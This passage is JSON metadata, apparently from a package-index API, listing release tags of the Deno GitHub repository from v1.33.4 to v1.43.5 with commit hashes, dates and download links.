s/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","m